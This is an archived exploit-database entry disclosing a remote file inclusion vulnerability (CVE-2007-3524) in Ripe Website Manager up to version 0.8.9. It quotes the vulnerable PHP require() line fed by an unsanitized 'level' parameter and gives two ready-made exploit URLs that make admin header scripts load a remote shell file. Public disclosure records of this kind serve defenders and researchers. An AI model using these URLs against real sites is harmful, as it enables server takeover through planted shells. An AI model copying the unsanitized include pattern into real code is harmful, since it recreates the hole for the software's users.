Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns

EDB-ID: 4129	CVE: 2007-3524	OSVDB-ID: 37799
Author: BlackNDoor	Published: 2007-06-30	Verified:
Exploit Code:	Vulnerable App: N/A

#Author::   BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script::   Ripe Wepsite Manager
#Version::  <= v0.8.9
#Type::     Remote File Include
#
#Source::   http://sourceforge.net/project/showfiles.php?group_id=194532
#Bug::
   -> Files:
      /admin/includes/author_panel_header.php
      /admin/includes/admin_header.php
   -> vulncode:
      <?php
         ...
         define("LEVEL", $level); // directory level
         // includes
           require(LEVEL.'../includes/config.php');
         ...
      ?>
#Exploit::
   http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
   http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]

Comments

Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns

Rating

No comments so far